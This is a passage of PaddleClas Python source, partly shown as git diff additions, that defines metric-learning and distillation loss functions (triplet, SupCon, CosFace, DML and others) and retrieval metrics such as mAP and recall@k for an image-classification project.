                 name="loss_dml"):
        super().__init__(act=act)
        assert isinstance(model_name_pairs, list)
        self.key = key
        self.model_name_pairs = model_name_pairs
        self.name = name

    def forward(self, predicts, batch):
        loss_dict = dict()
        for idx, pair in enumerate(self.model_name_pairs):
            out1 = predicts[pair[0]]
            out2 = predicts[pair[1]]
            if self.key is not None:
                out1 = out1[self.key]
                out2 = out2[self.key]
            loss = super().forward(out1, out2)
            if isinstance(loss, dict):
                for key in loss:
                    loss_dict["{}_{}_{}_{}".format(key, pair[0], pair[1],
                                                   idx)] = loss[key]
            else:
                loss_dict["{}_{}".format(self.name, idx)] = loss
        return loss_dict


class DistillationDistanceLoss(DistanceLoss):
    """
    DistillationDistanceLoss: elementwise distance loss between pairs of
    model outputs named in ``model_name_pairs``.
    """

    def __init__(self,
                 mode="l2",
                 model_name_pairs=[],
                 key=None,
                 name="loss_",
                 **kargs):
        super().__init__(mode=mode, **kargs)
        assert isinstance(model_name_pairs, list)
        self.key = key
        self.model_name_pairs = model_name_pairs
        # NOTE(review): the "_l2" suffix is appended regardless of mode —
        # looks like an oversight, but the key is runtime-visible so it is
        # kept unchanged here.
        self.name = name + "_l2"

    def forward(self, predicts, batch):
        loss_dict = dict()
        for idx, pair in enumerate(self.model_name_pairs):
            out1 = predicts[pair[0]]
            out2 = predicts[pair[1]]
            if self.key is not None:
                out1 = out1[self.key]
                out2 = out2[self.key]
            loss = super().forward(out1, out2)
            for key in loss:
                loss_dict["{}_{}_{}".format(self.name, key, idx)] = loss[key]
        return loss_dict
import paddle
import paddle.nn as nn
import paddle.nn.functional as F


class DMLLoss(nn.Layer):
    """Deep Mutual Learning loss: symmetric KL divergence between two model
    outputs, optionally passed through softmax or sigmoid first."""

    def __init__(self, act="softmax"):
        super().__init__()
        if act is None:
            self.act = None
        else:
            assert act in ["softmax", "sigmoid"]
            self.act = nn.Softmax(axis=-1) if act == "softmax" else nn.Sigmoid()

    def forward(self, out1, out2):
        # normalize both outputs to probabilities when an activation is set
        if self.act is not None:
            out1 = self.act(out1)
            out2 = self.act(out2)

        # average of KL(out2 || out1) and KL(out1 || out2); kl_div expects
        # log-probabilities as its first argument
        kl_12 = F.kl_div(paddle.log(out1), out2, reduction='batchmean')
        kl_21 = F.kl_div(paddle.log(out2), out1, reduction='batchmean')
        return {"DMLLoss": (kl_12 + kl_21) / 2.0}
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import math
import paddle
import numpy as np
from .comfunc import rerange_index


class EmlLoss(paddle.nn.Layer):
    """Metric-learning loss over batches laid out as P classes x K samples
    (K = samples_each_class). Uses a numerically stabilized surrogate of
    log(1 + beta * theta * e^bias) on the positive/negative distance gap."""

    def __init__(self, batch_size=40, samples_each_class=2):
        super(EmlLoss, self).__init__()
        assert (batch_size % samples_each_class == 0)
        self.samples_each_class = samples_each_class
        self.batch_size = batch_size
        # permutation putting, per row: anchor, positives, then negatives
        self.rerange_index = rerange_index(batch_size, samples_each_class)
        self.thresh = 20.0  # bias threshold switching to the approximation
        self.beta = 100000

    def surrogate_function(self, beta, theta, bias):
        """Exact surrogate: log(1 + beta*theta*e^bias) / log(1 + beta)."""
        x = theta * paddle.exp(bias)
        output = paddle.log(1 + beta * x) / math.log(1 + beta)
        return output

    def surrogate_function_approximate(self, beta, theta, bias):
        """Large-bias approximation (avoids overflow of e^bias):
        (log(theta) + bias + log(beta)) / log(1 + beta)."""
        output = (
            paddle.log(theta) + bias + math.log(beta)) / math.log(1 + beta)
        return output

    def surrogate_function_stable(self, beta, theta, target, thresh):
        """Piecewise-stable surrogate: exact branch below ``thresh``,
        approximate branch above, minus the value at the threshold so the
        two branches stitch together."""
        max_gap = paddle.to_tensor(thresh, dtype='float32')
        max_gap.stop_gradient = True

        target_max = paddle.maximum(target, max_gap)
        target_min = paddle.minimum(target, max_gap)

        loss1 = self.surrogate_function(beta, theta, target_min)
        loss2 = self.surrogate_function_approximate(beta, theta, target_max)
        bias = self.surrogate_function(beta, theta, max_gap)
        loss = loss1 + loss2 - bias
        return loss

    def forward(self, input, target=None):
        """input: {"features": [batch_size, dim]}; ``target`` is unused."""
        features = input["features"]
        samples_each_class = self.samples_each_class
        batch_size = self.batch_size
        rerange_index = self.rerange_index

        # calc distance: pairwise squared euclidean distance matrix
        diffs = paddle.unsqueeze(
            features, axis=1) - paddle.unsqueeze(
                features, axis=0)
        similary_matrix = paddle.sum(paddle.square(diffs), axis=-1)

        # re-order every row to [anchor, positives..., negatives...]
        tmp = paddle.reshape(similary_matrix, shape=[-1, 1])
        rerange_index = paddle.to_tensor(rerange_index)
        tmp = paddle.gather(tmp, index=rerange_index)
        similary_matrix = paddle.reshape(tmp, shape=[-1, batch_size])

        # split off the anchor's self-distance (ignored), then pos / neg
        ignore, pos, neg = paddle.split(
            similary_matrix,
            num_or_sections=[
                1, samples_each_class - 1, batch_size - samples_each_class
            ],
            axis=1)
        ignore.stop_gradient = True

        # max-shifted exponentials for numerical stability
        pos_max = paddle.max(pos, axis=1, keepdim=True)
        pos = paddle.exp(pos - pos_max)
        pos_mean = paddle.mean(pos, axis=1, keepdim=True)

        neg_min = paddle.min(neg, axis=1, keepdim=True)
        neg = paddle.exp(neg_min - neg)
        neg_mean = paddle.mean(neg, axis=1, keepdim=True)

        # bias = gap between hardest positive and hardest negative
        bias = pos_max - neg_min
        theta = paddle.multiply(neg_mean, pos_mean)

        loss = self.surrogate_function_stable(self.beta, theta, bias,
                                              self.thresh)
        loss = paddle.mean(loss)
        return {"emlloss": loss}
+ +import paddle +import paddle.nn as nn +import paddle.nn.functional as F + + +class GoogLeNetLoss(nn.Layer): + """ + Cross entropy loss used after googlenet + """ + def __init__(self, epsilon=None): + super().__init__() + assert (epsilon is None or epsilon <= 0 or epsilon >= 1), "googlenet is not support label_smooth" + + + def forward(self, inputs, label): + input0, input1, input2 = inputs + if isinstance(input0, dict): + input0 = input0["logits"] + if isinstance(input1, dict): + input1 = input1["logits"] + if isinstance(input2, dict): + input2 = input2["logits"] + + loss0 = F.cross_entropy(input0, label=label, soft_label=False) + loss1 = F.cross_entropy(input1, label=label, soft_label=False) + loss2 = F.cross_entropy(input2, label=label, soft_label=False) + loss = loss0 + 0.3 * loss1 + 0.3 * loss2 + loss = loss.mean() + return {"GooleNetLoss": loss} diff --git a/Smart_container/PaddleClas/ppcls/loss/msmloss.py b/Smart_container/PaddleClas/ppcls/loss/msmloss.py new file mode 100644 index 0000000..3aa0dd8 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/loss/msmloss.py @@ -0,0 +1,78 @@ +# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function +import paddle +from .comfunc import rerange_index + + +class MSMLoss(paddle.nn.Layer): + """ + MSMLoss Loss, based on triplet loss. USE P * K samples. 
+ the batch size is fixed. Batch_size = P * K; but the K may vary between batches. + same label gather together + + supported_metrics = [ + 'euclidean', + 'sqeuclidean', + 'cityblock', + ] + only consider samples_each_class = 2 + """ + + def __init__(self, batch_size=120, samples_each_class=2, margin=0.1): + super(MSMLoss, self).__init__() + self.margin = margin + self.samples_each_class = samples_each_class + self.batch_size = batch_size + self.rerange_index = rerange_index(batch_size, samples_each_class) + + def forward(self, input, target=None): + #normalization + features = input["features"] + features = self._nomalize(features) + samples_each_class = self.samples_each_class + rerange_index = paddle.to_tensor(self.rerange_index) + + #calc sm + diffs = paddle.unsqueeze( + features, axis=1) - paddle.unsqueeze( + features, axis=0) + similary_matrix = paddle.sum(paddle.square(diffs), axis=-1) + + #rerange + tmp = paddle.reshape(similary_matrix, shape=[-1, 1]) + tmp = paddle.gather(tmp, index=rerange_index) + similary_matrix = paddle.reshape(tmp, shape=[-1, self.batch_size]) + + #split + ignore, pos, neg = paddle.split( + similary_matrix, + num_or_sections=[1, samples_each_class - 1, -1], + axis=1) + ignore.stop_gradient = True + + hard_pos = paddle.max(pos) + hard_neg = paddle.min(neg) + + loss = hard_pos + self.margin - hard_neg + loss = paddle.nn.ReLU()(loss) + return {"msmloss": loss} + + def _nomalize(self, input): + input_norm = paddle.sqrt( + paddle.sum(paddle.square(input), axis=1, keepdim=True)) + return paddle.divide(input, input_norm) diff --git a/Smart_container/PaddleClas/ppcls/loss/multilabelloss.py b/Smart_container/PaddleClas/ppcls/loss/multilabelloss.py new file mode 100644 index 0000000..d30d5b8 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/loss/multilabelloss.py @@ -0,0 +1,43 @@ +import paddle +import paddle.nn as nn +import paddle.nn.functional as F + + +class MultiLabelLoss(nn.Layer): + """ + Multi-label loss + """ + + def __init__(self, 
epsilon=None): + super().__init__() + if epsilon is not None and (epsilon <= 0 or epsilon >= 1): + epsilon = None + self.epsilon = epsilon + + def _labelsmoothing(self, target, class_num): + if target.ndim == 1 or target.shape[-1] != class_num: + one_hot_target = F.one_hot(target, class_num) + else: + one_hot_target = target + soft_target = F.label_smooth(one_hot_target, epsilon=self.epsilon) + soft_target = paddle.reshape(soft_target, shape=[-1, class_num]) + return soft_target + + def _binary_crossentropy(self, input, target, class_num): + if self.epsilon is not None: + target = self._labelsmoothing(target, class_num) + cost = F.binary_cross_entropy_with_logits( + logit=input, label=target) + else: + cost = F.binary_cross_entropy_with_logits( + logit=input, label=target) + + return cost + + def forward(self, x, target): + if isinstance(x, dict): + x = x["logits"] + class_num = x.shape[-1] + loss = self._binary_crossentropy(x, target, class_num) + loss = loss.mean() + return {"MultiLabelLoss": loss} diff --git a/Smart_container/PaddleClas/ppcls/loss/npairsloss.py b/Smart_container/PaddleClas/ppcls/loss/npairsloss.py new file mode 100644 index 0000000..d4b359e --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/loss/npairsloss.py @@ -0,0 +1,38 @@ +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function +import paddle + + +class NpairsLoss(paddle.nn.Layer): + def __init__(self, reg_lambda=0.01): + super(NpairsLoss, self).__init__() + self.reg_lambda = reg_lambda + + def forward(self, input, target=None): + """ + anchor and positive(should include label) + """ + features = input["features"] + reg_lambda = self.reg_lambda + batch_size = features.shape[0] + fea_dim = features.shape[1] + num_class = batch_size // 2 + + #reshape + out_feas = paddle.reshape(features, shape=[-1, 2, fea_dim]) + anc_feas, pos_feas = paddle.split(out_feas, num_or_sections=2, axis=1) + anc_feas = paddle.squeeze(anc_feas, axis=1) + 
pos_feas = paddle.squeeze(pos_feas, axis=1) + + #get simi matrix + similarity_matrix = paddle.matmul( + anc_feas, pos_feas, transpose_y=True) #get similarity matrix + sparse_labels = paddle.arange(0, num_class, dtype='int64') + xentloss = paddle.nn.CrossEntropyLoss()( + similarity_matrix, sparse_labels) #by default: mean + + #l2 norm + reg = paddle.mean(paddle.sum(paddle.square(features), axis=1)) + l2loss = 0.5 * reg_lambda * reg + return {"npairsloss": xentloss + l2loss} diff --git a/Smart_container/PaddleClas/ppcls/loss/pairwisecosface.py b/Smart_container/PaddleClas/ppcls/loss/pairwisecosface.py new file mode 100644 index 0000000..beb8068 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/loss/pairwisecosface.py @@ -0,0 +1,55 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import math +import paddle +import paddle.nn as nn +import paddle.nn.functional as F + + +class PairwiseCosface(nn.Layer): + def __init__(self, margin, gamma): + super(PairwiseCosface, self).__init__() + self.margin = margin + self.gamma = gamma + + def forward(self, embedding, targets): + if isinstance(embedding, dict): + embedding = embedding['features'] + # Normalize embedding features + embedding = F.normalize(embedding, axis=1) + dist_mat = paddle.matmul(embedding, embedding, transpose_y=True) + + N = dist_mat.shape[0] + is_pos = targets.reshape([N,1]).expand([N,N]).equal(paddle.t(targets.reshape([N,1]).expand([N,N]))).astype('float') + is_neg = targets.reshape([N,1]).expand([N,N]).not_equal(paddle.t(targets.reshape([N,1]).expand([N,N]))).astype('float') + + # Mask scores related to itself + is_pos = is_pos - paddle.eye(N, N) + + s_p = dist_mat * is_pos + s_n = dist_mat * is_neg + + logit_p = -self.gamma * s_p + (-99999999.) * (1 - is_pos) + logit_n = self.gamma * (s_n + self.margin) + (-99999999.) * (1 - is_neg) + + loss = F.softplus(paddle.logsumexp(logit_p, axis=1) + paddle.logsumexp(logit_n, axis=1)).mean() + + return {"PairwiseCosface": loss} + + diff --git a/Smart_container/PaddleClas/ppcls/loss/supconloss.py b/Smart_container/PaddleClas/ppcls/loss/supconloss.py new file mode 100644 index 0000000..3dd33bc --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/loss/supconloss.py @@ -0,0 +1,108 @@ +import paddle +from paddle import nn + + +class SupConLoss(nn.Layer): + """Supervised Contrastive Learning: https://arxiv.org/pdf/2004.11362.pdf. 
+ It also supports the unsupervised contrastive loss in SimCLR""" + + def __init__(self, + views=16, + temperature=0.07, + contrast_mode='all', + base_temperature=0.07, + normalize_feature=True): + super(SupConLoss, self).__init__() + self.temperature = paddle.to_tensor(temperature) + self.contrast_mode = contrast_mode + self.base_temperature = paddle.to_tensor(base_temperature) + self.num_ids = None + self.views = views + self.normalize_feature = normalize_feature + + def forward(self, features, labels, mask=None): + """Compute loss for model. If both `labels` and `mask` are None, + it degenerates to SimCLR unsupervised loss: + https://arxiv.org/pdf/2002.05709.pdf + Args: + features: hidden vector of shape [bsz, n_views, ...]. + labels: ground truth of shape [bsz]. + mask: contrastive mask of shape [bsz, bsz], mask_{i,j}=1 if sample j + has the same class as sample i. Can be asymmetric. + Returns: + A loss scalar. + """ + features = features["features"] + if self.num_ids is None: + self.num_ids = int(features.shape[0] / self.views) + + if self.normalize_feature: + features = 1. 
* features / (paddle.expand_as( + paddle.norm( + features, p=2, axis=-1, keepdim=True), features) + 1e-12) + features = features.reshape([self.num_ids, self.views, -1]) + labels = labels.reshape([self.num_ids, self.views])[:, 0] + + if len(features.shape) < 3: + raise ValueError('`features` needs to be [bsz, n_views, ...],' + 'at least 3 dimensions are required') + if len(features.shape) > 3: + features = features.reshape( + [features.shape[0], features.shape[1], -1]) + + batch_size = features.shape[0] + if labels is not None and mask is not None: + raise ValueError('Cannot define both `labels` and `mask`') + elif labels is None and mask is None: + mask = paddle.eye(batch_size, dtype='float32') + elif labels is not None: + labels = labels.reshape([-1, 1]) + if labels.shape[0] != batch_size: + raise ValueError( + 'Num of labels does not match num of features') + mask = paddle.cast( + paddle.equal(labels, paddle.t(labels)), 'float32') + else: + mask = paddle.cast(mask, 'float32') + + contrast_count = features.shape[1] + contrast_feature = paddle.concat( + paddle.unbind( + features, axis=1), axis=0) + if self.contrast_mode == 'one': + anchor_feature = features[:, 0] + anchor_count = 1 + elif self.contrast_mode == 'all': + anchor_feature = contrast_feature + anchor_count = contrast_count + else: + raise ValueError('Unknown mode: {}'.format(self.contrast_mode)) + + # compute logits + anchor_dot_contrast = paddle.divide( + paddle.matmul(anchor_feature, paddle.t(contrast_feature)), + self.temperature) + # for numerical stability + logits_max = paddle.max(anchor_dot_contrast, axis=1, keepdim=True) + logits = anchor_dot_contrast - logits_max.detach() + + # tile mask + mask = paddle.tile(mask, [anchor_count, contrast_count]) + + logits_mask = 1 - paddle.eye(batch_size * anchor_count) + mask = mask * logits_mask + + # compute log_prob + exp_logits = paddle.exp(logits) * logits_mask + log_prob = logits - paddle.log( + paddle.sum(exp_logits, axis=1, keepdim=True)) + + # compute 
mean of log-likelihood over positive + mean_log_prob_pos = paddle.sum((mask * log_prob), + axis=1) / paddle.sum(mask, axis=1) + + # loss + loss = -(self.temperature / self.base_temperature) * mean_log_prob_pos + loss = paddle.mean(loss.reshape([anchor_count, batch_size])) + + return {"SupConLoss": loss} diff --git a/Smart_container/PaddleClas/ppcls/loss/trihardloss.py b/Smart_container/PaddleClas/ppcls/loss/trihardloss.py new file mode 100644 index 0000000..132c604 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/loss/trihardloss.py @@ -0,0 +1,82 @@ +# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import paddle +from .comfunc import rerange_index + + +class TriHardLoss(paddle.nn.Layer): + """ + TriHard Loss, based on triplet loss. USE P * K samples. + the batch size is fixed. Batch_size = P * K; but the K may vary between batches. 
samples with the same label are gathered together
TripletLossV2(nn.Layer): + """Triplet loss with hard positive/negative mining. + Args: + margin (float): margin for triplet. + """ + + def __init__(self, margin=0.5, normalize_feature=True): + super(TripletLossV2, self).__init__() + self.margin = margin + self.ranking_loss = paddle.nn.loss.MarginRankingLoss(margin=margin) + self.normalize_feature = normalize_feature + + def forward(self, input, target): + """ + Args: + inputs: feature matrix with shape (batch_size, feat_dim) + target: ground truth labels with shape (num_classes) + """ + inputs = input["features"] + + if self.normalize_feature: + inputs = 1. * inputs / (paddle.expand_as( + paddle.norm( + inputs, p=2, axis=-1, keepdim=True), inputs) + 1e-12) + + bs = inputs.shape[0] + + # compute distance + dist = paddle.pow(inputs, 2).sum(axis=1, keepdim=True).expand([bs, bs]) + dist = dist + dist.t() + dist = paddle.addmm( + input=dist, x=inputs, y=inputs.t(), alpha=-2.0, beta=1.0) + dist = paddle.clip(dist, min=1e-12).sqrt() + + # hard negative mining + is_pos = paddle.expand(target, ( + bs, bs)).equal(paddle.expand(target, (bs, bs)).t()) + is_neg = paddle.expand(target, ( + bs, bs)).not_equal(paddle.expand(target, (bs, bs)).t()) + + # `dist_ap` means distance(anchor, positive) + ## both `dist_ap` and `relative_p_inds` with shape [N, 1] + ''' + dist_ap, relative_p_inds = paddle.max( + paddle.reshape(dist[is_pos], (bs, -1)), axis=1, keepdim=True) + # `dist_an` means distance(anchor, negative) + # both `dist_an` and `relative_n_inds` with shape [N, 1] + dist_an, relative_n_inds = paddle.min( + paddle.reshape(dist[is_neg], (bs, -1)), axis=1, keepdim=True) + ''' + dist_ap = paddle.max(paddle.reshape( + paddle.masked_select(dist, is_pos), (bs, -1)), + axis=1, + keepdim=True) + # `dist_an` means distance(anchor, negative) + # both `dist_an` and `relative_n_inds` with shape [N, 1] + dist_an = paddle.min(paddle.reshape( + paddle.masked_select(dist, is_neg), (bs, -1)), + axis=1, + keepdim=True) + # shape [N] + dist_ap = 
paddle.squeeze(dist_ap, axis=1) + dist_an = paddle.squeeze(dist_an, axis=1) + + # Compute ranking hinge loss + y = paddle.ones_like(dist_an) + loss = self.ranking_loss(dist_an, dist_ap, y) + return {"TripletLossV2": loss} + + +class TripletLoss(nn.Layer): + """Triplet loss with hard positive/negative mining. + Reference: + Hermans et al. In Defense of the Triplet Loss for Person Re-Identification. arXiv:1703.07737. + Code imported from https://github.com/Cysu/open-reid/blob/master/reid/loss/triplet.py. + Args: + margin (float): margin for triplet. + """ + + def __init__(self, margin=1.0): + super(TripletLoss, self).__init__() + self.margin = margin + self.ranking_loss = paddle.nn.loss.MarginRankingLoss(margin=margin) + + def forward(self, input, target): + """ + Args: + inputs: feature matrix with shape (batch_size, feat_dim) + target: ground truth labels with shape (num_classes) + """ + inputs = input["features"] + + bs = inputs.shape[0] + # Compute pairwise distance, replace by the official when merged + dist = paddle.pow(inputs, 2).sum(axis=1, keepdim=True).expand([bs, bs]) + dist = dist + dist.t() + dist = paddle.addmm( + input=dist, x=inputs, y=inputs.t(), alpha=-2.0, beta=1.0) + dist = paddle.clip(dist, min=1e-12).sqrt() + + mask = paddle.equal( + target.expand([bs, bs]), target.expand([bs, bs]).t()) + mask_numpy_idx = mask.numpy() + dist_ap, dist_an = [], [] + for i in range(bs): + # dist_ap_i = paddle.to_tensor(dist[i].numpy()[mask_numpy_idx[i]].max(),dtype='float64').unsqueeze(0) + # dist_ap_i.stop_gradient = False + # dist_ap.append(dist_ap_i) + dist_ap.append( + max([ + dist[i][j] if mask_numpy_idx[i][j] == True else float( + "-inf") for j in range(bs) + ]).unsqueeze(0)) + # dist_an_i = paddle.to_tensor(dist[i].numpy()[mask_numpy_idx[i] == False].min(), dtype='float64').unsqueeze(0) + # dist_an_i.stop_gradient = False + # dist_an.append(dist_an_i) + dist_an.append( + min([ + dist[i][k] if mask_numpy_idx[i][k] == False else float( + "inf") for k in 
range(bs) + ]).unsqueeze(0)) + + dist_ap = paddle.concat(dist_ap, axis=0) + dist_an = paddle.concat(dist_an, axis=0) + + # Compute ranking hinge loss + y = paddle.ones_like(dist_an) + loss = self.ranking_loss(dist_an, dist_ap, y) + return {"TripletLoss": loss} diff --git a/Smart_container/PaddleClas/ppcls/metric/__init__.py b/Smart_container/PaddleClas/ppcls/metric/__init__.py new file mode 100644 index 0000000..9472123 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/metric/__init__.py @@ -0,0 +1,51 @@ +#copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +#Licensed under the Apache License, Version 2.0 (the "License"); +#you may not use this file except in compliance with the License. +#You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +#Unless required by applicable law or agreed to in writing, software +#distributed under the License is distributed on an "AS IS" BASIS, +#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +#See the License for the specific language governing permissions and +#limitations under the License. 
+ +from paddle import nn +import copy +from collections import OrderedDict + +from .metrics import TopkAcc, mAP, mINP, Recallk, Precisionk +from .metrics import DistillationTopkAcc +from .metrics import GoogLeNetTopkAcc +from .metrics import HammingDistance, AccuracyScore + + +class CombinedMetrics(nn.Layer): + def __init__(self, config_list): + super().__init__() + self.metric_func_list = [] + assert isinstance(config_list, list), ( + 'operator config should be a list') + for config in config_list: + assert isinstance(config, + dict) and len(config) == 1, "yaml format error" + metric_name = list(config)[0] + metric_params = config[metric_name] + if metric_params is not None: + self.metric_func_list.append( + eval(metric_name)(**metric_params)) + else: + self.metric_func_list.append(eval(metric_name)()) + + def __call__(self, *args, **kwargs): + metric_dict = OrderedDict() + for idx, metric_func in enumerate(self.metric_func_list): + metric_dict.update(metric_func(*args, **kwargs)) + return metric_dict + + +def build_metrics(config): + metrics_list = CombinedMetrics(copy.deepcopy(config)) + return metrics_list diff --git a/Smart_container/PaddleClas/ppcls/metric/metrics.py b/Smart_container/PaddleClas/ppcls/metric/metrics.py new file mode 100644 index 0000000..37509eb --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/metric/metrics.py @@ -0,0 +1,308 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +import numpy as np +import paddle +import paddle.nn as nn +import paddle.nn.functional as F + +from sklearn.metrics import hamming_loss +from sklearn.metrics import accuracy_score as accuracy_metric +from sklearn.metrics import multilabel_confusion_matrix +from sklearn.preprocessing import binarize + + +class TopkAcc(nn.Layer): + def __init__(self, topk=(1, 5)): + super().__init__() + assert isinstance(topk, (int, list, tuple)) + if isinstance(topk, int): + topk = [topk] + self.topk = topk + + def forward(self, x, label): + if isinstance(x, dict): + x = x["logits"] + + metric_dict = dict() + for k in self.topk: + metric_dict["top{}".format(k)] = paddle.metric.accuracy( + x, label, k=k) + return metric_dict + + +class mAP(nn.Layer): + def __init__(self): + super().__init__() + + def forward(self, similarities_matrix, query_img_id, gallery_img_id, + keep_mask): + metric_dict = dict() + + choosen_indices = paddle.argsort( + similarities_matrix, axis=1, descending=True) + gallery_labels_transpose = paddle.transpose(gallery_img_id, [1, 0]) + gallery_labels_transpose = paddle.broadcast_to( + gallery_labels_transpose, + shape=[ + choosen_indices.shape[0], gallery_labels_transpose.shape[1] + ]) + choosen_label = paddle.index_sample(gallery_labels_transpose, + choosen_indices) + equal_flag = paddle.equal(choosen_label, query_img_id) + if keep_mask is not None: + keep_mask = paddle.index_sample( + keep_mask.astype('float32'), choosen_indices) + equal_flag = paddle.logical_and(equal_flag, + keep_mask.astype('bool')) + equal_flag = paddle.cast(equal_flag, 'float32') + + num_rel = paddle.sum(equal_flag, axis=1) + num_rel = paddle.greater_than(num_rel, paddle.to_tensor(0.)) + num_rel_index = paddle.nonzero(num_rel.astype("int")) + num_rel_index = paddle.reshape(num_rel_index, [num_rel_index.shape[0]]) + equal_flag = paddle.index_select(equal_flag, num_rel_index, axis=0) + + acc_sum = paddle.cumsum(equal_flag, axis=1) + div = paddle.arange(acc_sum.shape[1]).astype("float32") + 
1 + precision = paddle.divide(acc_sum, div) + + #calc map + precision_mask = paddle.multiply(equal_flag, precision) + ap = paddle.sum(precision_mask, axis=1) / paddle.sum(equal_flag, + axis=1) + metric_dict["mAP"] = paddle.mean(ap).numpy()[0] + return metric_dict + + +class mINP(nn.Layer): + def __init__(self): + super().__init__() + + def forward(self, similarities_matrix, query_img_id, gallery_img_id, + keep_mask): + metric_dict = dict() + + choosen_indices = paddle.argsort( + similarities_matrix, axis=1, descending=True) + gallery_labels_transpose = paddle.transpose(gallery_img_id, [1, 0]) + gallery_labels_transpose = paddle.broadcast_to( + gallery_labels_transpose, + shape=[ + choosen_indices.shape[0], gallery_labels_transpose.shape[1] + ]) + choosen_label = paddle.index_sample(gallery_labels_transpose, + choosen_indices) + equal_flag = paddle.equal(choosen_label, query_img_id) + if keep_mask is not None: + keep_mask = paddle.index_sample( + keep_mask.astype('float32'), choosen_indices) + equal_flag = paddle.logical_and(equal_flag, + keep_mask.astype('bool')) + equal_flag = paddle.cast(equal_flag, 'float32') + + num_rel = paddle.sum(equal_flag, axis=1) + num_rel = paddle.greater_than(num_rel, paddle.to_tensor(0.)) + num_rel_index = paddle.nonzero(num_rel.astype("int")) + num_rel_index = paddle.reshape(num_rel_index, [num_rel_index.shape[0]]) + equal_flag = paddle.index_select(equal_flag, num_rel_index, axis=0) + + #do accumulative sum + div = paddle.arange(equal_flag.shape[1]).astype("float32") + 2 + minus = paddle.divide(equal_flag, div) + auxilary = paddle.subtract(equal_flag, minus) + hard_index = paddle.argmax(auxilary, axis=1).astype("float32") + all_INP = paddle.divide(paddle.sum(equal_flag, axis=1), hard_index) + mINP = paddle.mean(all_INP) + metric_dict["mINP"] = mINP.numpy()[0] + return metric_dict + + +class Recallk(nn.Layer): + def __init__(self, topk=(1, 5)): + super().__init__() + assert isinstance(topk, (int, list, tuple)) + if isinstance(topk, 
int): + topk = [topk] + self.topk = topk + + def forward(self, similarities_matrix, query_img_id, gallery_img_id, + keep_mask): + metric_dict = dict() + + #get cmc + choosen_indices = paddle.argsort( + similarities_matrix, axis=1, descending=True) + gallery_labels_transpose = paddle.transpose(gallery_img_id, [1, 0]) + gallery_labels_transpose = paddle.broadcast_to( + gallery_labels_transpose, + shape=[ + choosen_indices.shape[0], gallery_labels_transpose.shape[1] + ]) + choosen_label = paddle.index_sample(gallery_labels_transpose, + choosen_indices) + equal_flag = paddle.equal(choosen_label, query_img_id) + if keep_mask is not None: + keep_mask = paddle.index_sample( + keep_mask.astype('float32'), choosen_indices) + equal_flag = paddle.logical_and(equal_flag, + keep_mask.astype('bool')) + equal_flag = paddle.cast(equal_flag, 'float32') + real_query_num = paddle.sum(equal_flag, axis=1) + real_query_num = paddle.sum( + paddle.greater_than(real_query_num, paddle.to_tensor(0.)).astype( + "float32")) + + acc_sum = paddle.cumsum(equal_flag, axis=1) + mask = paddle.greater_than(acc_sum, + paddle.to_tensor(0.)).astype("float32") + all_cmc = (paddle.sum(mask, axis=0) / real_query_num).numpy() + + for k in self.topk: + metric_dict["recall{}".format(k)] = all_cmc[k - 1] + return metric_dict + + +class Precisionk(nn.Layer): + def __init__(self, topk=(1, 5)): + super().__init__() + assert isinstance(topk, (int, list, tuple)) + if isinstance(topk, int): + topk = [topk] + self.topk = topk + + def forward(self, similarities_matrix, query_img_id, gallery_img_id, + keep_mask): + metric_dict = dict() + + #get cmc + choosen_indices = paddle.argsort( + similarities_matrix, axis=1, descending=True) + gallery_labels_transpose = paddle.transpose(gallery_img_id, [1, 0]) + gallery_labels_transpose = paddle.broadcast_to( + gallery_labels_transpose, + shape=[ + choosen_indices.shape[0], gallery_labels_transpose.shape[1] + ]) + choosen_label = paddle.index_sample(gallery_labels_transpose, + 
